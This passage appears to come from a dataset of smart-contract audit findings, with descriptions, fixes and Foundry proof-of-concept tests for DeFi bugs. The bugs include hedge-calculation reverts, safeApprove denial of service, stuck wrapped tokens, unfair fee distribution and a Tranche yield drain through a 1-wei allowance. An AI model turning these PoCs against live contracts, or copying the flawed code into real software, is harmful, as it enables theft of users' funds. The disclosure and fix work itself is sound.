token balance is 0 or a tiny amount, then most if not all IG Bear trades will revert due to incorrect check of computation error during delta hedge amount calculation",medium,"When delta hedge amount is calculated in `FinanceIGDelta.deltaHedgeAmount`, the last step is to verify that delta hedge amount to sell is slightly more than vault's side token due to computation error. 
The check is the following:\\n```\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe check works correctly most of the time, but if the vault's side token (params.sideTokensAmount) is 0 or close to it, then the check will always fail, because `0 / 10000 = 0` and an unsigned amount cannot be less than 0. This means that even a tiny amount to sell (like 1 wei) will revert the transaction if the vault has 0 side tokens.\\nVault's side token is 0 when:\\nthe current price trades above high boundary (Kb)\\nand IG Bull used liquidity equals 0\\nIn such a situation, any IG bear trade doesn't impact hedge amount, but due to computation error will almost always result in tiny but non-0 side token amount to sell value, which will revert due to incorrect comparison described above.","Possibly check both relative (sideToken / 10000) and absolute (e.g. 1000 or side token UNIT / 10000) value. 
Alternatively, always limit side token to sell amount to max of side token balance when hedging (but needs additional research if that might create issues).","Almost all IG Bear trades will revert in certain situations, leading to core protocol function being unavailable and potentially loss of funds to the users who expected to do these trades.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport {TestnetPriceOracle} from ""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGTradeTest is Test {\\n using 
AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n 
VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.24e18, 1, 0); // re-balance to have 0 side tokens\\n testBuyOption(1.24e18, 0, 0.1e18); // reverts due to computation error and incorrect check to fix it\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n vm.stopPrank();\\n\\n console.log(""premium"", premium);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal returns (uint) {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(""payoff received"", charliePayoff);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nNotice: execution will revert when trying to buy IG Bear 
options.","```\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n" +Mint and sales can be dossed due to lack of safeApprove to 0,medium,"The lack of approval to 0 to the dvp contract, and the fee managers during DVP mints and sales will cause that subsequent transactions involving approval of these contracts to spend the basetoken will fail, breaking their functionality.\\nWhen DVPs are to be minted and sold through the PositionManager, the `mint` and `sell` functions are invoked. The first issue appears here, where the DVP contract is approved to spend the basetoken using the OpenZeppelin's `safeApprove` function, without first approving to zero. Further down the line, the `mint` and `sell` functions make calls to the DVP contract to `mint` and burn DVP respectively.\\nThe _mint and _burn functions in the DVP contract approves the fee manager to spend the fee - vaultFee/netFee.\\nThis issue here is that OpenZeppelin's `safeApprove()` function does not allow changing a non-zero allowance to another non-zero allowance. This will therefore cause all subsequent approval of the basetoken to fail after the first approval, dossing the contract's minting and selling/burning functionality.\\nOpenZeppelin's `safeApprove()` will revert if the account already is approved and the new `safeApprove()` is done with a non-zero value.\\n```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. 
To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n ""SafeERC20: approve from non-zero to non-zero allowance""\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\n",Approve first to 0;\\nUpdate the OpenZeppelin version to the latest and use the `forceApprove` functions instead;\\nRefactor the functions to allow for direct transfer of base tokens to the DVP and FeeManager contracts directly.,"This causes that after the first approval for the baseToken has been given, subsequent approvals will fail causing the functions to fail.","```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n ""SafeERC20: approve from non-zero to non-zero allowance""\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\n" +User wrapped tokens get stuck in master router because of incorrect calculation,medium,"Swapping exact tokens for ETH swaps underlying token amount, not wrapped token amount and this causes wrapped tokens to get stuck in the contract.\\nIn the protocol the `JalaMasterRouter` is used to swap tokens with less than 18 decimals. It is achieved by wrapping the underlying tokens and interacting with the `JalaRouter02`. Wrapping the token gives it decimals 18 (18 - token.decimals()). 
There are also functions that swap with native ETH.\\nIn the `swapExactTokensForETH` function the tokens are transferred from the user to the Jala master router, wrapped, approved to `JalaRouter2` and then `IJalaRouter02::swapExactTokensForETH()` is called with the amount of tokens to swap, to address, deadline and path.\\nThe amount of tokens to swap that is passed, is the amount before the wrap. Hence the wrappedAmount - underlyingAmount is stuck.\\nAdd the following test to `JalaMasterRouter.t.sol` and run with `forge test --mt testswapExactTokensForETHStuckTokens -vvv`\\n```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(""ETH user balance before: "", user0.balance);\\n console.log(""TokenA user balance before: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance before: "", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(""ETH user balance after: "", user0.balance);\\n console.log(""TokenA user balance after: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance after: "", 
IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\n","In `JalaMasterRouter::swapExactTokensForETH()` multiply the `amountIn` by decimal off set of the token:\\n```\\n function swapExactTokensForETH(\\n address originTokenAddress,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address[] calldata path,\\n address to,\\n uint256 deadline\\n ) external virtual override returns (uint256[] memory amounts) {\\n address wrappedTokenIn = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(originTokenAddress);\\n\\n require(path[0] == wrappedTokenIn, ""MS: !path"");\\n\\n TransferHelper.safeTransferFrom(originTokenAddress, msg.sender, address(this), amountIn);\\n _approveAndWrap(originTokenAddress, amountIn);\\n IERC20(wrappedTokenIn).approve(router, IERC20(wrappedTokenIn).balanceOf(address(this)));\\n\\n// Add the line below\\n uint256 decimalOffset = IChilizWrappedERC20(wrappedTokenIn).getDecimalsOffset();\\n// Add the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn * decimalOffset, amountOutMin, path, to, deadline);\\n// Remove the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn , amountOutMin, path, to, deadline);\\n }\\n```\\n","User wrapped tokens get stuck in router contract. 
The can be stolen by someone performing a `swapExactTokensForTokens()` because it uses the whole balance of the contract when swapping: `IERC20(wrappedTokenIn).balanceOf(address(this))`\\n```\\n amounts = IJalaRouter02(router).swapExactTokensForTokens(\\n IERC20(wrappedTokenIn).balanceOf(address(this)),\\n amountOutMin,\\n path,\\n address(this),\\n deadline\\n );\\n```\\n","```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(""ETH user balance before: "", user0.balance);\\n console.log(""TokenA user balance before: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance before: "", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(""ETH user balance after: "", user0.balance);\\n console.log(""TokenA user balance after: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance after: "", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\n" +JalaPair potential permanent DoS due to overflow,medium,"In the `JalaPair::_update` function, overflow is intentionally desired in the calculations for `timeElapsed` 
and `priceCumulative`. This is forked from the UniswapV2 source code, and it's meant and known to overflow. UniswapV2 was developed using Solidity 0.6.6, where arithmetic operations overflow and underflow by default. However, Jala utilizes Solidity >=0.8.0, where such operations will automatically revert.\\n```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\n",Use the `unchecked` block to ensure everything overflows as expected,"This issue could potentially lead to permanent denial of service for a pool. All the core functionalities such as `mint`, `burn`, or `swap` would be broken. Consequently, all funds would be locked within the contract.\\nI think issue with High impact and a Low probability (merely due to the extended timeframe for the event's occurrence, it's important to note that this event will occur with 100% probability if the protocol exists at that time), should be considered at least as Medium.\\nReferences\\nThere are cases where the same issue is considered High.","```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\n" +"Fees aren't distributed properly for positions with multiple lenders, causing loss of funds for lenders",high,"Fees distributed are calculated according to a lender's amount lent divided by the total amount lent, which causes more recent 
lenders to steal fees from older lenders.\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThe above is from harvest(); `repay()` calculates the fees similarly. Because `borrow()` doesn't distribute fees, the following scenario will occur when a borrower increases an existing position:\\nBorrower has an existing position with fees not yet collected by the lenders.\\nBorrower increases the position with a loan from a new lender.\\n`harvest()` or `repay()` is called, and the new lender is credited with some of the previous fees earned by the other lenders due to the fees calculation. Other lenders lose fees.\\nThis scenario can naturally occur during the normal functioning of the protocol, or a borrower/attacker with a position with a large amount of uncollected fees can maliciously open a proportionally large loan with an attacker to steal most of the fees.\\nAlso note that ANY UDPATE ISSUE? LOW PRIO",A potential fix is to harvest fees in the borrow() function; the scenario above will no longer be possible.,"Loss of funds for lenders, potential for borrowers to steal fees.","```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n" +Entrance fees are distributed wrongly in loans with multiple lenders,medium,"Entrance fees are distributed improperly, some lenders are likely to lose some portion of their entrance fees. 
Also, calling `updateHoldTokenEntranceFee()` can cause improper entrance fee distribution in loans with multiple lenders.\\nNote that entrance fees are added to the borrower's `feesOwed` when borrowing:\\n```\\n borrowing.feesOwed += entranceFee;\\n```\\n\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThis is a problem because the entrance fees will be distributed among all lenders instead of credited to each lender. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 tokens.\\nAfter some time, the lender harvests fees and fees are set to zero. (This step could be frontrunning the below step.)\\nThe borrower immediately takes out another loan of 100 tokens and pays and entrance fee of 10 tokens.\\nWhen fees are harvested again, due to the calculation in the code block above, 5 tokens of the entrance fee go to the first lender and 5 tokens go to the second lender. The first lender has collected 15 tokens of entrance fees, while the second lender has collected only 5- despite both loans having the same borrowed amount.\\nFurthermore, if the entrance fee is increased then new lenders will lose part of their entrance fee. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 tokens.\\nThe entrance fee is increased.\\nThe borrower increases the position by taking a loan of 100 tokens from a new lender, and pays an entrance fee of 20 tokens.\\n`harvest()` is called, and both lenders receive 15 tokens out of the total 30 tokens paid as entrance fees. 
This is wrong since the first lender should receive 10 and the second lender should receive 20.","Could add the entrance fee directly to the lender's fees balance instead of adding it to feesOwed, and then track the entrance fee in the loan data to be used in min fee enforcement calculations.",Lenders are likely to lose entrance fees.,```\\n borrowing.feesOwed += entranceFee;\\n```\\n +"A borrower eligible for liquidation can pay an improperly large amount of fees, and may be unfairly liquidated",medium,"If a borrower is partially liquidated and then increases the collateral balance to avoid further liquidation, they will pay an improperly large amount of fees and can be unfairly liquidated.\\n```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n\\nWhen liquidation occurs right after becoming liquidatable, the `collateralBalance` calculation in `repay()` above will be a small value like -1; and essentially all the fees owed will be collected.\\nIf the borrower notices the partial liquidation and wishes to avoid further liquidation, `increaseCollateralBalance()` can be called to become solvent again. But since the `accLoanRatePerSeconds` wasn't updated, the borrower will have to doubly pay all the fees that were just collected. This will happen if a lender calls `harvest()` or the loan is liquidated again. 
The loan can also be liquidated unfairly, because the `collateralBalance` calculated above will be much lower than it should be.",Update `accLoanRatePerSeconds` for incomplete emergency liquidations.,"The borrower may pay too many fees, and it's also possible to unfairly liquidate the position.","```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n" +All yield could be drained if users set any ````> 0```` allowance to others,high,"`Tranche.redeemWithYT()` is not well implemented, all yield could be drained if users set any `> 0` allowance to others.\\nThe issue arises on L283, all `accruedInTarget` is sent out, this will not work while users have allowances to others. 
Let's say, alice has `1000 YT` (yield token) which has generated `100 TT` (target token), and if she approves bob `100 YT` allowance, then bob should only be allowed to take the proportional target token, which is `100 TT` * (100 YT / 1000 YT) = 10 TT.\\n```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n\\nThe following coded PoC shows all unclaimed and unaccrued target token could be drained out, even if the allowance is as low as `1wei`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {TestTranche} from ""./Tranche.t.sol"";\\nimport ""forge-std/console2.sol"";\\n\\ncontract TrancheAllowanceIssue is TestTranche {\\n address bob = address(0x22);\\n function setUp() public virtual override {\\n super.setUp();\\n }\\n\\n function testTrancheAllowanceIssue() public {\\n // 1. issue some PT and YT\\n deal(address(underlying), address(this), 1_000e6, true);\\n tranche.issue(address(this), 1_000e6);\\n\\n // 2. generating some unclaimed yield\\n vm.warp(block.timestamp + 30 days);\\n _simulateScaleIncrease();\\n\\n // 3. give bob any negligible allowance, could be as low as only 1wei\\n tranche.approve(bob, 1);\\n yt.approve(bob, 1);\\n\\n // 4. 
all unclaimed and pending yield drained by bob\\n assertEq(0, underlying.balanceOf(bob));\\n vm.prank(bob);\\n tranche.redeemWithYT(address(this), bob, 1);\\n assertTrue(underlying.balanceOf(bob) > 494e6);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-01-napier\\napier-v1> forge test --match-test testTrancheAllowanceIssue -vv\\n[⠔] Compiling// rest of code\\n[⠊] Compiling 42 files with 0.8.19\\n[⠔] Solc 0.8.19 finished in 82.11sCompiler run successful!\\n[⠒] Solc 0.8.19 finished in 82.11s\\n\\nRunning 1 test for test/unit/TrancheAllowanceIssue.t.sol:TrancheAllowanceIssue\\n[PASS] testTrancheAllowanceIssue() (gas: 497585)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n","```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/napier// Remove the line below\\nv1/src/Tranche.sol b/napier// Remove the line below\\nv1/src/Tranche.sol\\nindex 62d9562..65db5c6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/napier// Remove the line below\\nv1/src/Tranche.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/napier// Remove the line below\\nv1/src/Tranche.sol\\n@@ // Remove the line below\\n275,12 // Add the line below\\n275,15 @@ contract Tranche is BaseToken, ReentrancyGuard, Pausable, ITranche {\\n delete unclaimedYields[from];\\n gscales = _gscales;\\n\\n// Add the line below\\n uint256 accruedProportional = accruedInTarget * pyAmount / _yt.balanceOf(from);\\n// Add the line below\\n unclaimedYields[from] = accruedInTarget // Remove the line below\\n accruedProportional;\\n// Add the line below\\n \\n // Burn PT and YT tokens from `from`\\n _burnFrom(from, pyAmount);\\n _yt.burnFrom(from, msg.sender, pyAmount);\\n\\n // Withdraw underlying tokens from the adapter and transfer them to the user\\n// Remove the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // 
Add the line below\\n accruedInTarget);\\n// Add the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // Add the line below\\n accruedProportional);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n\\n emit RedeemWithYT(from, to, amountWithdrawn);\\n```\\n",Users lost all unclaimed and unaccrued yield,"```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n" +LP Tokens always valued at 3 PTs,high,"LP Tokens are always valued at 3 PTs. As a result, users of the AMM pool might receive fewer assets/PTs than expected. The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.\\nThe Napier AMM pool facilitates trade between underlying assets and PTs. The PTs in the pool are represented by the Curve's Base LP Token of the Curve's pool that holds the PTs. The Napier AMM pool and Router math assumes that the Base LP Token is equivalent to 3 times the amount of PTs, as shown below. 
When the pool is initially deployed, it is correct that the LP token is equivalent to 3 times the amount of PT.\\n```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n\\n```\\nFile: NapierPool.sol\\n /// @dev Number of coins in the BasePool\\n uint256 internal constant N_COINS = 3;\\n..SNIP..\\n totalBaseLptTimesN: baseLptUsed * N_COINS,\\n..SNIP..\\n totalBaseLptTimesN: totalBaseLpt * N_COINS,\\n```\\n\\nIn Curve, LP tokens are generally priced by computing the underlying tokens per share, hence dividing the total underlying token amounts by the total supply of the LP token. Given that the underlying assets in Curve's stable swap are pegged to each other, the invariant's $D$ value can be computed to estimate the total value of the underlying tokens.\\nCurve itself provides a function `get_virtual_price` that computes the price of the LP token by dividing $D$ with the total supply.\\nNote that for LP tokens, the ratio of the total underlying value and the total supply will grow (fee mechanism) over time. Thus, the virtual price's value will increase over time.\\nThis means the LP token will be worth more than 3 PTs in the Curve Pool over time. 
However, the Napier AMM pool still values its LP token at a constant value of 3 PTs. This discrepancy between the value of the LP tokens in the Napier AMM pool and Curve pool might result in various issues, such as the following:\\nInvestors bought LP tokens at the price of 3.X PT from the market. The LP tokens are deposited into or swapped into the Napier AMM pool. The Napier Pool will always assume that the price of the LP token is 3 PTs, thus shortchanging the number of assets or PTs returned to users.\\nPotential arbitrage opportunity where malicious users obtain the LP token from the Napier AMM pool at a value of 3 PT and redeem the LP token at a value higher than 3 PTs, pocketing the differences.","Napier and Pendle share the same core math for their AMM pool.\\nIn Pendle, the AMM stores the PTs and SY (Standard Yield Token). When performing any operation (e.g., deposit, swap), the SY will be converted to the underlying assets based on SY's current rate before performing any math operation. If it is a SY (wstETH), the SY's rate will be the current exchange rate for wstETH to stETH/ETH. One could also think the AMM's reserve is PTs and Underlying Assets under the hood.\\nIn Napier, the AMM stores the PTs and Curve's LP tokens. When performing any operation, the math will always convert the LP token to underlying assets using a static exchange rate of 3. However, this is incorrect, as the value of an LP token will grow over time. The AMM should value the LP tokens based on their current value. The virtual price of the LP token and other information can be leveraged to derive the current value of the LP tokens to facilitate the math operation within the pool.","Users of the AMM pool might receive fewer assets/PTs than expected. 
